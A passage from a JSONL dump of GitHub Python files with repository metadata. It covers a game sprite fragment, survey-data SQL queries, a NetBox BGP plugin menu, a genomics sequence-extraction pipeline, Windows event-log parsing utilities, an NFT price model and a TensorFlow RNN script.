_YAY_LABELS.extend([_mkYayLbl(n) for n in xrange(len(_YAY_LABELS), len(_YAY_LABELS)+10)])\n self.lbl = _YAY_LABELS[level]\n self.lbl.x = window.width // 2\n self.lbl.y = window.height // 2\n self.countdown = 60\n self.halfcountdown = self.countdown // 2\n self.done = False\n self.halfDone = False\n def update(self):\n if self.countdown:\n self.countdown -= 1\n self.halfDone = self.countdown > self.halfcountdown\n self.done = not self.countdown\n def paint(self):\n self.lbl.draw()\n","repo_name":"deestan/invade","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40295778448","text":"import psycopg2\n# from theapp import app\n# import viz\n# from flask import render_template, request\n#import pandas as pd #We don't have pandas yet.\n#We need to get some input things\n\n\n#y_n = request.args.get('all_or_none', default = None, type = str)\n#qst = request.args.get('question' , default = None, type = str)\n# subset by dropdown\ny_n = 'yes'\nqst = \"Who/what are your favorite media sources that report on data science topics?\"\n\nquestion_to_column = {\"Which of the following relational database products do you use on a regular basis?\": 'q34',\n 'Which of the following cloud computing platforms do you use on a regular basis?' : 'q29',\n \"Which of the following natural language processing (NLP) methods do you use on a regular basis?\": 'q27',\n 'Which categories of computer vision methods do you use on a regular basis?': 'q26',\n 'Which categories of ML tools do you use on a regular basis?' : 'q25' ,\n 'Which of the following ML algorithms do you use on a regular basis?': 'q24',\n 'What programming languages do you use on a regular basis?': 'q18',\n \"Which of the following integrated development environments (IDE's) do you use on a regular basis?\": 'q16',\n \"What is the primary tool that you use at work or school to analyze data?\": 'q14',\n \"On which platforms have you begun or completed data science courses?\" : 'q13',\n \"Who/what are your favorite media sources that report on data science topics?\": 'q12',\n \"Select any activities that make up an important part of your role at work\": 'q9'}\n\nother_questions = ['q9', 'q12', 'q14', 'q15', 'q16', 'q18', 'q24', 'q25', 'q26', 'q27', \"q29\", 'q34']\n\n# q14 is all free response so all or none are equivalent.\n\nquestion_size = {'q34': 12,\n 'q29': 12,\n 'q27': 6,\n 'q26': 7,\n 'q25': 8,\n 'q24': 12,\n 'q18': 12,\n 'q16': 12,\n 'q14': 5,\n 'q13': 12,\n 'q12': 12,\n 'q9': 8 }\n\n# Initialization code to be able to query the database\nconn = psycopg2.connect(\"dbname=kaggle user=abucklin\")\ncur = conn.cursor()\n\ndef query_generator_and_data_grabber(question = qst, yes_or_no = y_n):\n qnum = question_to_column[qst]\n columns = []\n for i in range(1, question_size[qnum]+1):\n string = qnum + \"_\" + str(i)\n columns.append(string)\n\n columns = columns.replace( \"]\" , \"'\").replace(\"[\", '').replace(\"'\", '')\n\n basic = \"SELECT \" + columns + \" FROM mcq \"\n conditions = ''\n query = basic + conditions + \";\"\n cur.execute(query)\n data = cur.fetchall()\n\n if \"y\" in yes_or_no :\n second = \"SELECT \" + str(qnum) + \"FROM other_questions\"\n cur.execute(second + \";\")\n x = cur.fetchall()\n data = data.extend(x)\n return data\n\n\nraw_data = query_generator_and_data_grabber()\n\n#data = pd.DataFrame(raw_data, columns = [in_ss , in_pp]) #Still don't have pandas.\n","repo_name":"mandab749/State_of_Data_Science","sub_path":"Word_Cloud_queries.py","file_name":"Word_Cloud_queries.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70831663130","text":"from django.conf import settings\n\nfrom extras.plugins import PluginMenuButton, PluginMenuItem, PluginMenu\nfrom utilities.choices import ButtonColorChoices\n\n\n_menu_items = (\n PluginMenuItem(\n link='plugins:netbox_bgp:community_list',\n link_text='Communities',\n permissions=['netbox_bgp.view_community'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:community_add',\n title='Communities',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_community'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgpsession_list',\n link_text='Sessions',\n permissions=['netbox_bgp.view_bgpsession'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgpsession_add',\n title='Sessions',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgpsession'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:routingpolicy_list',\n link_text='Routing Policies',\n permissions=['netbox_bgp.view_routingpolicy'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:routingpolicy_add',\n title='Routing Policies',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_routingpolicy'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:prefixlist_list',\n link_text='Prefix Lists',\n permissions=['netbox_bgp.view_prefixlist'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:prefixlist_add',\n title='Prefix Lists',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_prefixlist'],\n ),\n ),\n ),\n PluginMenuItem(\n link='plugins:netbox_bgp:bgppeergroup_list',\n link_text='Peer Groups',\n permissions=['netbox_bgp.view_bgppeergroup'],\n buttons=(\n PluginMenuButton(\n link='plugins:netbox_bgp:bgppeergroup_add',\n title='Peer Groups',\n icon_class='mdi mdi-plus-thick',\n color=ButtonColorChoices.GREEN,\n permissions=['netbox_bgp.add_bgppeergroup'],\n ),\n ),\n )\n)\n\nplugin_settings = settings.PLUGINS_CONFIG.get('netbox_bgp', {})\n\nif plugin_settings.get('top_level_menu'):\n menu = PluginMenu( \n label=\"BGP\",\n groups=((\"BGP\", _menu_items),),\n icon_class=\"mdi mdi-bootstrap\",\n )\nelse:\n menu_items = _menu_items\n","repo_name":"k01ek/netbox-bgp","sub_path":"netbox_bgp/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"32"} +{"seq_id":"6268192961","text":"\"\"\" Scripts with helper functions to download and process gene sequences\n using raw DNA sequences and annotation files.\n\"\"\"\nimport os\nfrom Bio import SeqIO\nfrom . import config, utils\n\n\n# Define Global Vars\nANNOT_SUFFIX_DICT = {'Ensembl': 'gff3',\n 'Refseq': 'gff',\n 'Maize': 'gff3',\n 'Maize_addition': 'gff3',\n 'Maize_nam': 'gff3'}\nGENE_SUFFIX_DICT = {'Ensembl': 'fa',\n 'Refseq': 'fna',\n 'Maize': 'fa',\n 'Maize_addition': 'fa',\n 'Maize_nam': 'fa'}\n\n\n# Helper functions for download data from the selected Database\ndef generate_directories(db_name):\n \"\"\" Creates a list of directories to be added\n Params:\n db_name: str, name of the database to be processed\n \"\"\"\n # Create paths to be added\n db_path = config.data_raw / db_name\n dna_path = db_path / 'dna'\n annot_path = db_path / 'annot'\n processed_db_path = config.data_processed / db_name\n\n for path in [db_path, dna_path, annot_path, processed_db_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef faidx(dna_path, dna_name):\n \"\"\" Adapted from Inari noteobok. Used to extract .fai from .fa file\n Params:\n dna_path: str, directory for the .fa/.fna dna file\n dna_name: str, name for dna .fa/.fna file\n \"\"\"\n exe_str = f\"{config.samtools} faidx {os.path.join(dna_path, dna_name)}\"\n utils.execute(exe_str)\n\n\ndef extract_flanking_region(annot_name, annot_path, db_name):\n \"\"\" Adapted from Inari noteobok. Used to extract the flanking region.\n Generates a .gene.gff3/gff file using the .gff3/gff file.\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n \"\"\"\n # Generate input and output file names\n in_path = os.path.join(annot_path, annot_name)\n suffix = ANNOT_SUFFIX_DICT[db_name]\n out_path = in_path.replace(f\".{suffix}\", f\".gene.{suffix}\")\n exe_str = f\"grep -P '\\tgene\\t' {in_path} > {out_path}\" # -P for ubuntu, -p for linux\n utils.execute(exe_str)\n\n\ndef get_1kbup(dna_name, annot_name, dna_path, annot_path, regulatory_len, db_name):\n \"\"\" Adapted from Inari noteobok. Creates the .gene.1kbup.gff3 file\n using the .gene.gff3 generated using extract_flanking_region.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n regulatory_len: int, length of regulatory region to be extracted\n db_name: str, name of the database to be processed\n \"\"\"\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n\n # Create the exe command to get 1kbup\n exe_str = f\"{config.bedtools} flank -i \"\n exe_str += f\"{os.path.join(annot_path, annot_gene)} \"\n exe_str += f\"-g {os.path.join(dna_path, dna_name)}.fai \"\n exe_str += f\"-l {str(regulatory_len)} \"\n exe_str += \"-r 0 \"\n exe_str += \"-s \"\n exe_str += f\"> {os.path.join(annot_path, annot_1kbup)}\"\n utils.execute(exe_str)\n\n\ndef subtract(dna_name, annot_name, annot_path, db_name):\n ''' Adapted from Inari noteobok. Apply Bedtools subtract to subtract genic\n regions of neighbouring genes from the intergenic flanks.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, directory that stores the gff3/gff file\n annot_path: str, directory that stores the gff3/gff file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_gene = annot_name.replace(f\".{suffix}\", f\".gene.{suffix}\")\n annot_1kbup = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.{suffix}\")\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n\n exe_str = f\"{config.bedtools} subtract -a \" + \\\n os.path.join(annot_path, annot_1kbup)\n exe_str += \" -b \" + os.path.join(annot_path, annot_gene)\n exe_str += \" > \" + os.path.join(annot_path, annot_nov)\n utils.execute(exe_str)\n\n\ndef remove_split_fragments(annot_name, annot_path, db_name):\n ''' Go over the gtf file and if multiple promoter fragments for one gene:\n retain only last one (largest coordinates) in case of positive strand\n retain only first one (smallest coordinates) in case of negative strand\n Params:\n annot_name: str, name of the annotation .gff3 file\n annot_path: str, directory that stores the gff3 file\n db_name: str, name of the database to be processed\n '''\n suffix = ANNOT_SUFFIX_DICT[db_name]\n annot_nov = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.{suffix}\")\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n\n # Read in all the extracted regions\n with open(os.path.join(annot_path, annot_nov)) as gtf_fh_in:\n fragment_dict = {}\n orientation_dict = {}\n for line in gtf_fh_in:\n line = line.rstrip()\n line_list = line.split('\\t')\n if db_name == 'Ensembl':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Refseq':\n gene_id_temp = line_list[-1].split(';')[1]\n gene_id = gene_id_temp.split(\":\")[1]\n elif db_name == 'Maize':\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split(':')[1]\n else:\n gene_id_temp = line_list[-1].split(';')[0]\n gene_id = gene_id_temp.split('=')[1]\n orientation = line_list[6]\n line_list[2] = gene_id\n orientation_dict[gene_id] = orientation\n if gene_id not in fragment_dict:\n fragment_dict[gene_id] = []\n fragment_dict[gene_id].append(\"\\t\".join(line_list))\n\n # Write out only the retained ones\n with open(os.path.join(annot_path, annot_final), \"w\") as gtf_fh_out:\n for gene_id in fragment_dict:\n if orientation_dict[gene_id] == '+':\n # take fragment with highest coords, which is latest one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][-1]))\n else:\n # orientation == -\n # take fragment with lowest coords, which is first one added\n gtf_fh_out.write(\"{}\\n\".format(fragment_dict[gene_id][0]))\n\n\ndef extract_sequence(dna_name, annot_name, dna_path, annot_path, save_path, db_name):\n ''' Adapted from Inari noteobok. Uses Bedtools getfasta to extract\n the final sequences, w/ extension \".gene.1kbup.nov.final.fa\".\n Params:\n dna_name: str, name for dna .fa file\n annot_name: str, name of the annotation .gff3 file\n dna_path: str, directory for the .fa dna file\n annot_path: str, directory that stores the gff3 file\n save_path: str, directory for the output .fa file\n db_name: str, name of the database to be processed\n '''\n # Generate input and output file names\n suffix = ANNOT_SUFFIX_DICT[db_name]\n suffix_g = GENE_SUFFIX_DICT[db_name]\n annot_final = annot_name.replace(f\".{suffix}\", f\".gene.1kbup.nov.final.{suffix}\")\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n\n exe_str = f\"{config.bedtools} getfasta -fi \" + \\\n os.path.join(dna_path, dna_name)\n exe_str += \" -bed \" + os.path.join(annot_path, annot_final)\n exe_str += \" -s -name+ > \"\n exe_str += os.path.join(save_path, dna_final)\n utils.execute(exe_str)\n\n\ndef generate_sequence_for_species(dna_name, annot_name, dna_url, annot_url,\n dna_path, annot_path, save_path, db_name,\n species_name, regulatory_len=1000):\n \"\"\" The main function that chains the above methods together to extract the\n relevant sequesnces from the initial .fa/fna dna file and .gff3/gff\n annotation file downloaded from the Ensembl database.\n Params:\n dna_name: str, name for dna .fa/fna file\n annot_name: str, name of the annotation .gff3/gff file\n dna_url: str, url to download the .fa/fna file\n annot_url: str, url to download the .gff3/gff file\n dna_path: str, directory for the .fa/fna dna file\n annot_path: str, directory that stores the gff3/gff file\n save_path: str, directory for the output .fa/fna file\n db_name: str, name of the database to be processed\n species_name: str, name of species\n regulatory_len: int, length of regulatory region to be extracted\n \"\"\"\n # Generate directories\n generate_directories(db_name)\n\n # Create species-specific directory\n species_name = species_name.strip().lower()\n dna_path_s = dna_path / species_name\n annot_path_s = annot_path / species_name\n save_path = save_path / species_name\n for path in [dna_path_s, annot_path_s, save_path]:\n if not os.path.exists(path):\n os.mkdir(path)\n\n # Download the raw fa and gff files\n utils.download(dna_url, dna_path_s, db_name, dna_name)\n utils.download(annot_url, annot_path_s, db_name, annot_name)\n\n # Unzip the gz files\n utils.unzip(dna_path_s, dna_name)\n utils.unzip(annot_path_s, annot_name)\n\n # Run Faidx command\n faidx(dna_path_s, dna_name)\n\n # Only extract the flanking regions for the genes\n extract_flanking_region(annot_name, annot_path_s, db_name)\n\n # Get 1kbup file\n get_1kbup(dna_name, annot_name, dna_path_s, annot_path_s, regulatory_len, db_name)\n\n # Bedtools to subtract genic regions of neighbouring genes\n # from the intergenic flanks\n subtract(dna_name, annot_name, annot_path_s, db_name)\n\n # Remove Split fragments\n remove_split_fragments(annot_name, annot_path_s, db_name)\n\n # Extract the resulting sequence\n extract_sequence(dna_name, annot_name, dna_path_s, annot_path_s, save_path, db_name)\n\n # Remove raw sequence files\n utils.clear_folder(dna_path_s, to_continue='y')\n # utils.clear_folder(annot_path_s, to_continue='y')\n\n\ndef load_processed_fa(processed_db_path, dna_name, db_name, species_name):\n \"\"\" Helper function to load sequences with name dna_name.\n Params:\n processed_db_path: db_path within processed data folder\n dna_name: name of the .fa/fna file to be loaded\n db_name: str, name of the database to be processed\n species_name: str, name of species\n \"\"\"\n suffix_g = GENE_SUFFIX_DICT[db_name]\n dna_final = dna_name.replace(f\".{suffix_g}\", f\".gene.1kbup.nov.final.{suffix_g}\")\n f_path = os.path.join(processed_db_path, species_name, dna_final)\n fasta_sequences = SeqIO.parse(open(f_path), 'fasta')\n return fasta_sequences\n","repo_name":"benlevyx/florabert","sub_path":"module/inari/gene_db_io.py","file_name":"gene_db_io.py","file_ext":"py","file_size_in_byte":11309,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"21087709708","text":"import os\nimport glob\nimport logging\nimport jsonlines\nimport vars\nimport json\nimport pandas as pd\nimport platform\n\n\ndef create_log_fields_string(event, log_fields):\n output_strings = list()\n for field in log_fields:\n if field in event[\"Event\"][\"EventData\"]:\n output_strings.append(field + \":\" + event[\"Event\"][\"EventData\"][field])\n\n return \"\\n\\n\".join(output_strings)\n\n\ndef dict_flatten(in_dict, dict_out=None, parent_key=None, separator=\".\"):\n if dict_out is None:\n dict_out = {}\n\n for k, v in in_dict.items():\n k = f\"{parent_key}{separator}{k}\" if parent_key else k\n if isinstance(v, dict):\n dict_flatten(in_dict=v, dict_out=dict_out, parent_key=k)\n continue\n\n dict_out[k] = v\n\n return dict_out\n\n\ndef normalize_event(event):\n flattened_dict = dict_flatten(event)\n\n event_id = event[\"Event\"][\"System\"][\"EventID\"]\n if type(event_id) != int:\n event[\"Event\"][\"System\"][\"EventID\"] = event_id[\"#text\"]\n\n if \"EventData\" not in event[\"Event\"].keys() or event[\"Event\"][\"EventData\"] is None:\n event[\"Event\"][\"EventData\"] = dict()\n\n for k in event[\"Event\"][\"System\"].keys():\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][\"System\"][k]\n\n for k in event[\"Event\"].keys():\n if k != \"EventData\":\n event[\"Event\"][\"EventData\"][k] = event[\"Event\"][k]\n\n if \"UserData\" in event[\"Event\"].keys():\n for k in event[\"Event\"][\"UserData\"].keys():\n event[\"Event\"][\"EventData\"][k] = dict()\n for k_ in event[\"Event\"][\"UserData\"][k].keys():\n event[\"Event\"][\"EventData\"][k][k_] = event[\"Event\"][\"UserData\"][k][k_]\n\n for k, v in flattened_dict.items():\n event[\"Event\"][\"EventData\"][k.split(\".\")[-1]] = v\n\n return event\n\n\ndef retrieve_all_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"interesting_events.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_first_occurence_rules():\n for rule_info in json.load(open(vars.RULE_DIR + \"first_occurence.json\", 'r'))[\"rules\"]:\n yield rule_info\n\n\ndef retrieve_all_events():\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n with jsonlines.open(file_info[\"json_dump_filename\"]) as reader:\n for item in reader:\n yield item\n\n\ndef get_description_for_event_id(event_id):\n event_id = int(event_id)\n description_loc = vars.EVENT_ID_MAPPING[vars.EVENT_ID_MAPPING['event_id'] == event_id]\n return ', '.join(description_loc[\"description\"].tolist())\n\n\ndef load_event_id_mappings():\n df = pd.read_csv(vars.EXTERNAL_DIR + \"event_id_mapping.csv\", delimiter=\";\")\n\n # using dictionary to convert specific columns\n convert_dict = {'event_id': int}\n df = df.astype(convert_dict)\n vars.EVENT_ID_MAPPING = df\n\n\ndef get_all_event_channels():\n event_channels = set()\n for file_info in json.load(open(vars.TMP_DIR + \"files.json\", 'r'))[\"files\"]:\n event_channels.update(list(file_info[\"event_channel_counts\"].keys()))\n\n return list(event_channels)\n\n\ndef get_recursive_filenames(path, file_suffix):\n filenames = list()\n\n for subdir, dirs, files in os.walk(path):\n for file in files:\n filename = os.path.join(subdir, file)\n if filename.endswith(file_suffix):\n filenames.append(filename)\n\n return filenames\n\n\ndef remove_all_tmp_json_files():\n files = glob.glob(vars.TMP_DIR + \"/evtx_dump/*.json\")\n for f in files:\n os.remove(f)\n\n\ndef setup_logger():\n logger = logging.getLogger('evtx-hunter')\n logger.setLevel(logging.DEBUG)\n\n # create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # create formatter\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # add formatter to ch\n ch.setFormatter(formatter)\n\n # add ch to logger\n logger.addHandler(ch)\n\n return logger\n\n\ndef sort_dict(_dict, reverse=False):\n event_summary_list = sorted(_dict.items(), key=lambda x: x[1], reverse=reverse)\n return dict(event_summary_list)\n\n\ndef is_cygwin():\n return platform.system().startswith(\"CYGWIN\")\n\n\ndef is_64_bit():\n return os.uname().machine == \"x86_64\"\n\n\ndef get_cygwin_root():\n return \"/cygwin\" + (\"64/\" if is_64_bit() else \"/\")\n\n\ndef set_cygwin_vars():\n if is_cygwin():\n vars.CYGWIN = True\n vars.CYGWIN_DIR = get_cygwin_root()\n vars.CYGDRIVE_DIR = \"/cygdrive/\"\n else:\n vars.CYGWIN = False\n\n\n# Forwards the original path or corrects it for Cygwin\ndef path_for_exe(path):\n # Path from Cygwin must be corrected before it can be used with .exe\n if vars.CYGWIN:\n # Ensures that the path is absolute \n path = os.path.abspath(path)\n # Path leads to a place within Windows filesystem\n if path.startswith(vars.CYGDRIVE_DIR):\n # Deletes the cygrdive prefix and the drive letter\n path = path[11:]\n # Path leads to a place within Linux filesystem\n else:\n # Adds the Cygwin prefix so .exe can reach the place\n path = vars.CYGWIN_DIR + path\n return path\n","repo_name":"NVISOsecurity/evtx-hunter","sub_path":"app/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"32"} +{"seq_id":"73296511452","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 28 14:20:05 2023\r\n\r\n@author: efthi\r\n\"\"\"\r\n\r\n#import lightgbm as lgb\r\nimport numpy as np\r\nfrom sklearn.model_selection import cross_val_score, KFold\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport lightgbm as lgb\r\n\r\nlabel_encoder = LabelEncoder()\r\n\r\n\r\n# Assuming you have your features (X) and target variable (y) ready\r\nEtherium_price = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\eth_usd_fx_rates.csv\")\r\ntokens_metadate = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_metadata.csv\")\r\ntokens_sales = pd.read_csv(r\"C:\\Users\\efthi\\Downloads\\cryptopunks_test_bundle\\20230509\\token_sales.csv\")\r\n\r\n\r\n'''\r\nMerged and sorted given the token \r\nindex firstly and then the timestamp\r\n'''\r\nData = pd.merge(tokens_metadate, tokens_sales, on='token_index')\r\nData = Data.filter(regex='^(?!Unnamed)')\r\n\r\n\r\ncat_features = ['Skin Tone', \"Type\", \"Hair\",\r\n \"Eyewear\", \"Mouth\", \"Headwear\",\r\n \"Facial Hair\", \"Smoking Device\",\r\n \"Other:Earring\", \"Neckwear\",\r\n \"Skin Feature\", \"Other:Medical Mask\",\r\n \"Other:Clown Nose\", \"Trait Count\",\r\n \"rarest_property_name\"]\r\n\r\nfor feature in cat_features:\r\n Data[feature] = Data[feature].astype('category').cat.codes\r\n\r\n\r\nimport re\r\nData = Data.rename(columns = lambda x:re.sub('[^A-Za-z0-9_]+', '', x))\r\n\r\n\r\n\"\"\"\r\ncreate a dataset with the unique nft which \r\nare sold only once so we dont have historic data to train our model\r\n\"\"\"\r\n# Identify duplicate rows\r\nduplicates = Data.duplicated(subset= \"token_index\", keep=False)\r\ndf_duplicates = Data[duplicates]\r\ndf_unique = Data[~duplicates]\r\n\r\n\r\n'''\r\nThis \"test\" dataset contains only the token \r\nwith the last sold price given the timestamp plus the unique tokens\r\nwhich might be sold only once\r\n'''\r\n# Sort the dataframe by 'timestamp' in descending order\r\ndf_sorted = Data.sort_values(by='timestamp', ascending=False)\r\n\r\n# Drop duplicates based on 'token_index' while keeping the row with the largest 'timestamp'\r\nTest_data = df_sorted.drop_duplicates(subset='token_index', keep='first')\r\n\r\nX_test = Test_data.drop(columns=[\"eth\",'usd'])\r\nY_test = Test_data.loc[:, Test_data.columns == 'eth']\r\n\r\n\r\n\r\n'''\r\nKeep the data which have been sold more than once.\r\n'''\r\nTrain_data_x = df_sorted[~df_sorted['timestamp'].isin(Test_data['timestamp'])]\r\nTrain_data = Train_data_x[~Train_data_x['token_index'].isin(df_unique['token_index'])]\r\n\r\nX_train = Train_data.drop(columns=[\"eth\",'usd'])\r\ny_train = Train_data.loc[:, Train_data.columns == 'eth']\r\n\r\n\r\n\r\n# Create a LightGBM dataset\r\ntrain_data = lgb.Dataset(X_train, label=y_train)\r\n\r\n\r\nparams = {\r\n 'boosting_type': 'gbdt',\r\n 'objective': 'regression',\r\n 'metric': 'mse',\r\n 'num_leaves': 100,\r\n 'learning_rate': 0.05,\r\n 'feature_fraction': 0.9,\r\n 'bagging_fraction': 0.8,\r\n 'bagging_freq': 5,\r\n 'verbose': 0\r\n}\r\n\r\n# Train the model\r\nnum_rounds = 100\r\nmodel = lgb.train(params, train_data, num_rounds)\r\n\r\n# Make predictions on the testing set\r\ny_pred = model.predict(X_test)\r\n\r\n# Evaluate the model\r\nmse = mean_squared_error(Y_test, y_pred)\r\nprint('Mean Squared Error:', mse)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"EfthyvoulosDrousiotis/NFT_valuation","sub_path":"NFT_valuations.py","file_name":"NFT_valuations.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34036293525","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\n\r\ntruncatedBackpropLength = 5\r\nnumOfInputNodes = 1\r\nnumOfOutputNodes = 2\r\n\r\nnumOfHiddenNodes = 6\r\n\r\nbatchSize = 4\r\n\r\nrandScaler = 0.01\r\n\r\n\r\n\r\nsess = tf.Session()\r\n\r\nx_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfInputNodes])\r\ny_batch = tf.placeholder(tf.float32, shape=[None, truncatedBackpropLength, numOfOutputNodes])\r\n\r\n\r\nx_list = []\r\n\r\nW2 = tf.Variable(np.random.rand(numOfInputNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\nb_hidden = tf.Variable(tf.zeros([numOfHiddenNodes]))\r\n\r\nW3 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfHiddenNodes)*randScaler, dtype=tf.float32)\r\ncontext = tf.Variable(tf.zeros([batchSize, numOfHiddenNodes]), dtype=tf.float32)\r\n\r\nW4 = tf.Variable(np.random.rand(numOfHiddenNodes,numOfOutputNodes)*randScaler, dtype=tf.float32)\r\nb_output = tf.Variable(tf.zeros([numOfOutputNodes]))\r\n\r\ncross_entropy_sum = tf.Variable(tf.zeros([1]))\r\naccuracy_list = []\r\n\r\n\r\nfor seriesStep in range (truncatedBackpropLength):\r\n xTemp = tf.squeeze(tf.slice(x_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n y_label = tf.squeeze(tf.slice(y_batch, [0,seriesStep,0], [-1, 1, -1]))\r\n\r\n if (numOfInputNodes == 1):\r\n \txTemp = tf.reshape(xTemp, [batchSize, numOfInputNodes])\r\n \ty_label = tf.reshape(y_label, [batchSize, numOfOutputNodes])\r\n\r\n x_list.append(xTemp)\r\n\r\n\r\n \r\n hidden = tf.matmul(xTemp,W2) + tf.matmul(context,W3) + b_hidden\r\n \r\n # context = hidden\r\n hidden_clipped = tf.nn.tanh(hidden) \r\n context = hidden_clipped\r\n output = tf.matmul(hidden_clipped, W4) + b_output\r\n \r\n\r\n y_predicted = tf.nn.softmax(output)\r\n\r\n \r\n correct_prediction = tf.equal(tf.argmax(y_predicted,1), tf.argmax(y_label,1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n accuracy_list.append(accuracy)\r\n \r\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_label * tf.log(y_predicted), reduction_indices=[1]))\r\n cross_entropy_sum = cross_entropy_sum + cross_entropy\r\n\r\ncontext_final = context\r\ncross_final = cross_entropy_sum\r\nLEARNING_RATE = 0.05\r\ntraining = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy_sum)\r\n\r\nx_final = x_list\r\naccuracy_final = accuracy_list\r\n\r\n\r\n \r\n\r\ninit = tf.global_variables_initializer()\r\nsess.run(init)\r\n\r\nimport numpy as np\r\n\r\n# Start= [1,0,0,0,0,0,0]\r\n# Coffee= [0,1,0,0,0,0,0];\r\n# Tea= [0,0,1,0,0,0,0];\r\n# Water= [0,0,0,1,0,0,0];\r\n# Cream= [0,0,0,0,1,0,0];\r\n# Sugar= [0,0,0,0,0,1,0];\r\n# Stir= [0,0,0,0,0,0,1];\r\n\r\n\r\n# # %%% output; this is the teacher output \r\n# Coffeeout= [1,0,0,0,0,0,0,0]; \r\n# Teaout= [0,1,0,0,0,0,0,0];\r\n# Waterout= [0,0,1,0,0,0,0,0];\r\n# Creamout= [0,0,0,1,0,0,0,0];\r\n# Sugarout= [0,0,0,0,1,0,0,0];\r\n# Stirout= [0,0,0,0,0,1,0,0];\r\n# Coffeebev= [0,0,0,0,0,0,1,0];\r\n# Teabev= [0,0,0,0,0,0,0,1];\r\n\r\n# inputBatch = []\r\n# outputBatch = []\r\n\r\n# # %%% Seq1 tea water second \r\n\r\n# TWInp=[Start,Tea,Water,Stir,Sugar,Stir]\r\n# TWOut=[Teaout,Waterout,Stirout,Sugarout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TWInp)\r\n# outputBatch.append(TWOut)\r\n\r\n# # %%% Seq2 tea water second \r\n\r\n# TSInp=[Start,Tea,Sugar,Stir,Water,Stir]\r\n# TSOut=[Teaout,Sugarout,Stirout,Waterout,Stirout,Teabev]\r\n\r\n# inputBatch.append(TSInp)\r\n# outputBatch.append(TSOut)\r\n\r\n\r\n# # %%% Seq3 coffee water first \r\n\r\n# CWInp=[Start,Coffee,Water,Stir,Cream,Stir]\r\n# CWOut=[Coffeeout,Waterout,Stirout,Creamout,Stirout,Coffeebev]\r\n\r\n# inputBatch.append(CWInp)\r\n# outputBatch.append(CWOut)\r\n\r\n\r\n# # %%% Seq4 coffee water second\r\n\r\n# 